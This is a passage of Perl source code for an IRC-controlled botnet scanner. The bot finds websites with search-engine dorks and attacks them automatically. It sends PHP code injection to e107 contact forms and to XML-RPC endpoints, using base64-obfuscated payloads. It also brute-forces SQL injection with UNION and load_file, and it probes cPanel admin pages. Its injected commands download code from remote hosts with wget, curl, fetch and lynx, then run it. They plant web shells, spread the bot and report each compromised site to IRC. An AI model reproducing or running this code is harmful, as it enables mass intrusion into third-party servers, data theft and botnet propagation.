  1466.                                                 &get_content("http://".$site."e107_themes/pb.php"); my $dor = "http://".$site."e107_themes/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1467.                                                 }
  1468.                     elsif ($res =~ /stun_dplug/) {
  1469.                                                 &get_content("http://".$site."e107_plugins/pb.php"); my $dor = "http://".$site."e107_plugins/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1470.                                                 }
  1471.                     elsif ($res =~ /stun_dima/) {
  1472.                                                 &get_content("http://".$site."e107_images/pb.php"); my $dor = "http://".$site."e107_images/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1473.                                                 }
  1474.                     else {
  1475.                                                 &msg("$chan","$e107logo 12(4@0$engine12)(4@7VULN12)11 ".$test." 12(4@7".$sys."12)(4@0safemode-4ON12) ");sleep(2);
  1476.                                                 my $dor = "http://".$site."h4rd.php";
  1477.                                                 my $check = &get_content($dor); &get_content("http://".$site."pb.php");
  1478.                                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1479.                                                 &info_main($dor,$chan,$engine,$e107logo);
  1480.                                                 }
  1481.                                         }
  1482.                                 &e107_spread_query($test);
  1483.                 sleep(2); } exit; }
  1484.             }
  1485.         }
  1486.     }
  1487. }
  1488.  
  1489. sub e107_rce_query() {
  1490.     my $url = $_[0];
  1491.     my $code = $_[1];
  1492.         my $cod2 = "aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoImNkIC90bXAgJiYgd2dldCAiLiRpbmplY3Rvci4iIC1PIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIHdnZXQgIi4kYm90c2hlbGwuIiAtTyBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBleGVjKCJjZCAvdG1wICYmIGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgZmV0Y2ggLU8gaDRyZC5waHAgIi4kYm90c2hlbGwuIiAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBleGVjKCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAZXhlYygiY2QgL3RtcCAmJiBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgbHlueCAtZHVtcCAiLiRib3RzaGVsbC4iIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQGV4ZWMoImNkIC90bXAgJiYgR0VUICIuJGluamVjdG9yLiI+cGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgR0VUICIuJGJvdHNoZWxsLiI+aDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAZXhlYygiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQpAc2hlbGxfZXhlYygiY2QgL3RtcCAmJiB3Z2V0ICIuJGluamVjdG9yLiIgLU8gcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgd2dldCAiLiRib3RzaGVsbC4iIC1PIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHNoZWxsX2V4ZWMoImNkIC90bXAgJiYgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBmZXRjaCAtTyBoNHJkLnBocCAiLiRib3RzaGVsbC4iICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHNoZWxsX2V4ZWMoImNkIC90bXAgJiYgY1VybCAtTyBwYi5waHAgIi4kaW5qZWN0b3IuIiAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGNVcmwgLU8gaDRyZC5waHAgIi4kYm90c2hlbGwuIiAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBzaGVsbF9leGVjKCJjZCAvdG1wICYmIGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBseW54IC1kdW1wICIuJGJvdHNoZWxsLiIgaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc2hlbGxfZXhlYygiY2QgL3RtcCAmJiBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBHRVQgIi4kYm90c2hlbGwuIj5oNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBzaGVsbF9leGVjKCJjZCAvdG1wICYmIGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGx3cC1kb3dubG9hZCAiLiRib3RzaGVsbC4iIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQHN5c3RlbSgiY2QgL3RtcCAmJiB3Z2V0ICIuJGluamVjdG9yLiIgLU8gcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgd2dldCAiLiRib3RzaGVsbC4iIC1PIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHN5c3RlbSgiY2QgL3RtcCAmJiBmZXRjaCAtTyBwYi5waHAgIi4kaW5qZWN0b3IuIiAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGZldGNoIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBseW54IC1kdW1wICIuJGJvdHNoZWxsLiIgaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIEdFVCAiLiRpbmplY3Rvci4iPnBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIEdFVCAiLiRib3RzaGVsbC4iPmg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHN5c3RlbSgiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQHBhc3N0aHJ1KCJjZCAvdG1wICYmIHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiB3Z2V0ICIuJGJvdHNoZWxsLiIgLU8gaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAcGFzc3RocnUoImNkIC90bXAgJiYgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBmZXRjaCAtTyBoNHJkLnBocCAiLiRib3RzaGVsbC4iICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHBhc3N0aHJ1KCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAcGFzc3RocnUoImNkIC90bXAgJiYgbHlueCAtZHVtcCAiLiRpbmplY3Rvci4iIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGx5bnggLWR1bXAgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBwYXNzdGhydSgiY2QgL3RtcCAmJiBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBHRVQgIi4kYm90c2hlbGwuIj5oNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBwYXNzdGhydSgiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0=";
  1493.         my $cmd = "eval(base64_decode('".$cod2."'));eval(base64_decode('".$code."'));eval(include('".$injector."'));";
  1494.     my $req = HTTP::Request->new(POST => $url);
  1495.     $req->content_type("application/x-www-form-urlencoded");
  1496.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd.$b0tcmd ."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1497.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1498.     $ua->timeout(7);
  1499.     my $res = $ua->request($req);
  1500.     return $res->content;
  1501. }
  1502.  
  1503. sub e107_spread_query() {
  1504.     my $url = $_[0];
  1505.     my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1506.     my $cmd = "eval(base64_decode('".$cod2."'));eval(base64_decode('".$code."'));eval(include('".$injector."'));";
  1507.         my $req = HTTP::Request->new(POST => $url);
  1508.     $req->content_type("application/x-www-form-urlencoded");
  1509.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd.$b0tcmd ."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1510.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1511.     $ua->timeout(7);
  1512.     my $res = $ua->request($req);
  1513. }
  1514.  
  1515. ######################## xml
  1516. sub xml() {
  1517.         my ($chan,$bug,$dork,$engine) = @_;
  1518.     my $count = 0;
  1519.     my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
  1520.     my $num = scalar(@list);
  1521.     if ($num > 0) {
  1522.         foreach my $site (@list) {
  1523.             $count++;
  1524.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$xmllogo 12(4@0$engine12) 11==14F11=15I11=0N11=0I11=15S11=14H11== "); } }
  1525.             my $test = "http://".$site.$bug;
  1526.             my $vuln = "http://".$site."12".$bug;
  1527.             my $html = &get_content($test);
  1528.             if ($html =~ /faultCode/ ) {
  1529.             if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1530.             my $resp = &xml_cek_query($test);
  1531.                         if ($resp =~ /pVd5c9pIFv97XeXv0NFm/s) {
  1532.                         &xml_spread_query($test);sleep(2);
  1533.                         my $sys = $1;
  1534.                         my $check = &get_content("http://".$site."h4rd.php");
  1535.                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1536.                                 &msg("$chan","$xmllogo 12(4@0$engine12)(4@8SHELL12)13 http://".$site."13h4rd.php 8".$sys);&get_content("http://".$site."pb.php"); sleep(2);}
  1537.                                 else {
  1538.                                 &msg("$chan","$xmllogo 12(4@0$engine12)(4@7SYSTEM12)11 ".$vuln." 8".$sys); sleep(2);}
  1539.                         }
  1540.         sleep(2); } exit; } }
  1541.                 }
  1542.         }
  1543. }
  1544.  
  1545. sub xml_cek_query() {
  1546.     my $url     = $_[0];
  1547.         my $code = "system('uname -a'); eval(include('".$injector."'));";
  1548.     my $ua = LWP::UserAgent->new(agent => 'perl post');
  1549.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1550.         $exploit .= "<methodName>test.method</methodName>";
  1551.         $exploit .= "<params><param><value><name>',''));";
  1552.         $exploit .= "echo'pVd5c9pIFv97XeXv0NFm';".$code."echo'pVd5c9pIFv97XeXv0NFm';exit;/*</name></value></param></params></methodCall>";
  1553.         $ua->timeout(7);
  1554.         my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
  1555.     return $res->content;
  1556. }
  1557.  
  1558. sub xml_spread_query() {
  1559. my $xmltargt = $_[0];
  1560. my $xmlsprd  = "exec('cd /tmp; wget ".$injector." -O pb.php; chmod 755 pb.php; php pb.php; fetch -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; cUrl -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; lynx -dump ".$injector." pb.php; chmod 755 pb.php; php pb.php; GET ".$injector.">pb.php; chmod 755 pb.php; php pb.php; lwp-download ".$injector." pb.php; chmod 755 pb.php; php pb.php; wget ".$botak." -O sb.txt; chmod 755 sb.txt; perl sb.txt; fetch -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; cUrl -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; lynx -dump ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt; GET ".$botak.">sb.txt; chmod 755 sb.txt; perl sb.txt; lwp-download ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt*'); shell_exec('cd /tmp; wget ".$injector." -O pb.php; chmod 755 pb.php; php pb.php; fetch -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; cUrl -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; lynx -dump ".$injector." pb.php; chmod 755 pb.php; php pb.php; GET ".$injector.">pb.php; chmod 755 pb.php; php pb.php; lwp-download ".$injector." pb.php; chmod 755 pb.php; php pb.php; wget ".$botak." -O sb.txt; chmod 755 sb.txt; perl sb.txt; fetch -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; cUrl -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; lynx -dump ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt; GET ".$botak.">sb.txt; chmod 755 sb.txt; perl sb.txt; lwp-download ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt*'); system('cd /tmp; wget ".$injector." -O pb.php; chmod 755 pb.php; php pb.php; fetch -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; cUrl -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; lynx -dump ".$injector." pb.php; chmod 755 pb.php; php pb.php; GET ".$injector.">pb.php; chmod 755 pb.php; php pb.php; lwp-download ".$injector." pb.php; chmod 755 pb.php; php pb.php; wget ".$botak." -O sb.txt; chmod 755 sb.txt; perl sb.txt; fetch -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; cUrl -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; lynx -dump ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt; GET ".$botak.">sb.txt; chmod 755 sb.txt; perl sb.txt; lwp-download ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt*');  passthru('cd /tmp; wget ".$injector." -O pb.php; chmod 755 pb.php; php pb.php; fetch -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; cUrl -O pb.php ".$injector."; chmod 755 pb.php; php pb.php; lynx -dump ".$injector." pb.php; chmod 755 pb.php; php pb.php; GET ".$injector.">pb.php; chmod 755 pb.php; php pb.php; lwp-download ".$injector." pb.php; chmod 755 pb.php; php pb.php; wget ".$botak." -O sb.txt; chmod 755 sb.txt; perl sb.txt; fetch -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; cUrl -O sb.txt ".$botak."; chmod 755 sb.txt; perl sb.txt; lynx -dump ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt; GET ".$botak.">sb.txt; chmod 755 sb.txt; perl sb.txt; lwp-download ".$botak." sb.txt; chmod 755 sb.txt; perl sb.txt*'); eval(include('".$injector."'));";
  1561.                 my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1562.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1563.         $exploit .= "<methodName>test.method</methodName>";
  1564.         $exploit .= "<params><param><value><name>',''));";
  1565.         $exploit .= "echo'pVd5c9pIFv97XeXv0NFm';".$xmlsprd."echo'pVd5c9pIFv97XeXv0NFm';exit;/*</name></value></param></params></methodCall>";
  1566.         $userAgent->timeout(7);
  1567. my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
  1568. }
  1569.  
  1570. ######################## SQL
  1571. sub sql() {
  1572.         my ($chan,$bug,$dork,$engine) = @_;
  1573.     my $count = 0;
  1574.     my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
  1575.     my $num = scalar(@list);
  1576.     if ($num > 0) {
  1577.         foreach my $site (@list) {
  1578.             $count++;
  1579.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$sqllogo 12(4@0$engine12) 7==14F7=15I7=0N7=0I7=14S7=14H7== "); } }
  1580.             my $test = "http://".$site.$bug."'";
  1581.             my $vuln = "http://".$site."12".$bug;
  1582.                         my $sqlsite = "http://".$site.$bug;
  1583.             my $html = &get_content($test);
  1584.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1585.             if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
  1586.                 &sqlbrute($sqlsite,$chan,$engine);}
  1587.             elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  1588.                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(13@12MsSQL15)4 ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
  1589.             elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  1590.                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(13@12MsAccess15)4 ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
  1591.             elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  1592.                 &sqlbrute($sqlsite,$chan,$engine);}
  1593.             } exit; sleep(2); }
  1594.         }
  1595.     }
  1596. }
  1597. sub sqlbrute() {
  1598.                         my $situs=$_[0];
  1599.                         my $chan  =$_[1];
  1600.                         my $engine=$_[2];
  1601.                         my $columns=35;
  1602. my $cfin.="--";
  1603. my $cmn.= "+";
  1604. for ($column = 0 ; $column < $columns ; $column ++)
  1605.         {
  1606.         $union.=','.$column;
  1607.         $inyection.=','."0x6c6f67696e70776e7a";
  1608.     if ($column == 0)
  1609.       {
  1610.                   $inyection = '';
  1611.           $union = '';
  1612.       }
  1613.     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
  1614.     $response=get($sql);
  1615.     if($response =~ /loginpwnz/)
  1616.                 {
  1617.          $column ++;
  1618.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
  1619.                  &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)3 $sql  ");
  1620.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
  1621.          $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
  1622.          if($response =~ /loginpwnz/)
  1623.                 {
  1624.                 $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
  1625.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14INFO_SCHEMA15)3 $sql  ");
  1626.                 }
  1627.          $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
  1628.          $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
  1629.          if($response =~ /loginpwnz/)
  1630.                 {
  1631.                 $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
  1632.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14USER15)3 $sql  ");
  1633.                 }
  1634.          else
  1635.                 {
  1636.                 }
  1637.         while ($loadcont < $column-1)
  1638.            {
  1639.                 $loadfile.=','.'load_file(0x2f70726f632f73656c662f656e7669726f6e2530303030696e636c7564652822687474703a2f2f626c6f672e737369732e6564752e766e2f2e6d6f64732f70626f742e7478743f22293b)';
  1640.                 $loadcont++;
  1641.            }
  1642.            $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f70726f632f73656c662f656e7669726f6e2530303030696e636c7564652822687474703a2f2f626c6f672e737369732e6564752e766e2f2e6d6f64732f70626f742e7478743f22293b)".$loadfile.$cfin;
  1643.           $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
  1644.          if($response =~ /apache/)
  1645.                 {
  1646.                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14Load File15)3 $sql  ");
  1647.                         }
  1648.          else
  1649.                 {
  1650.                 }
  1651.                   foreach $tabla(@tabele)
  1652.                 {
  1653.                   chomp($tabla);
  1654.                   $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1655.                                  $response=get($sql)or die("[-] Impossible to get tables\n");
  1656.                   if($response =~ /loginpwnz/)
  1657.                     {
  1658.                     $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
  1659.                                         &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(4@14Tabel15)3 $sql  ");
  1660.                                         &tabelka($situs,$tabla,$chan,$engine);
  1661.                     }
  1662.                 }
  1663.                 }
  1664.         }                      
  1665. }
  1666.  
  1667. sub tabelka() {
  1668.                         my $situs =$_[0];
  1669.                         my $tabla =$_[1];
  1670.                         my $chan  =$_[2];
  1671.                         my $engine=$_[3];
  1672.                         my $cfin.="--";
  1673.                         my $cmn.= "+";
  1674.             chomp($tabla);
  1675.             foreach $columna(@kolumny)
  1676.             {
  1677.              chomp($columna);
  1678.              $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1679.              $response=get($sql)or die("[-] Impossible to get columns\n");
  1680.              if ($response =~ /loginpwnz/)
  1681.                 {
  1682.                                 &msg("$chan","0,1$sqllogo(4@0$engine15)15(4@12SQL15)(7@14SQLi Vuln14)3 $situs 14(4@14Kolom14)3 $columna 14(4@14Tabel14)3 $tabla  ");
  1683.                 }
  1684.             }
  1685.        
  1686. }
  1687.  
  1688. ######################## Cpanel
  1689. sub cpanel() {
  1690.         my ($chan,$bug,$dork,$engine) = @_;
  1691.     my $count = 0;
  1692.     my @list = &search_engine($chan,$bug,$dork,$engine,$cpanlogo);
  1693.     my $num = scalar(@list);
  1694.     if ($num > 0) {
  1695.         foreach my $site (@list) {
  1696.             $count++;
  1697.          if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$cpanlogo 12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4== "); } }
  1698.             my $test = "http://".$site.$bug;
  1699.                         my $zine = "http://".$site."admin/content.php?act=tambahuser";
  1700.             my $re    = &get_content($zine);
  1701.            if ($re =~ /<input type=text name=nama_lengkap size=30>/){
  1702.                         &msg("$chan","$cpanlogo 12(4@0$engine12)(4@8OK4]9 http://".$site."4admin/content.php?act=tambahuser");sleep(2);
  1703.             }
  1704.                 }
  1705.     }
  1706. }
  1707. sub cpanel2() {
  1708.         my ($chan,$bug,$dork,$engine) = @_;
  1709.     my $count = 0;     
  1710.     my @list = &search_engine($chan,$bug,$dork,$engine,$cpanlogo);
  1711.     my $num = scalar(@list);
  1712.     if ($num > 0) {
  1713.         foreach my $site (@list) {
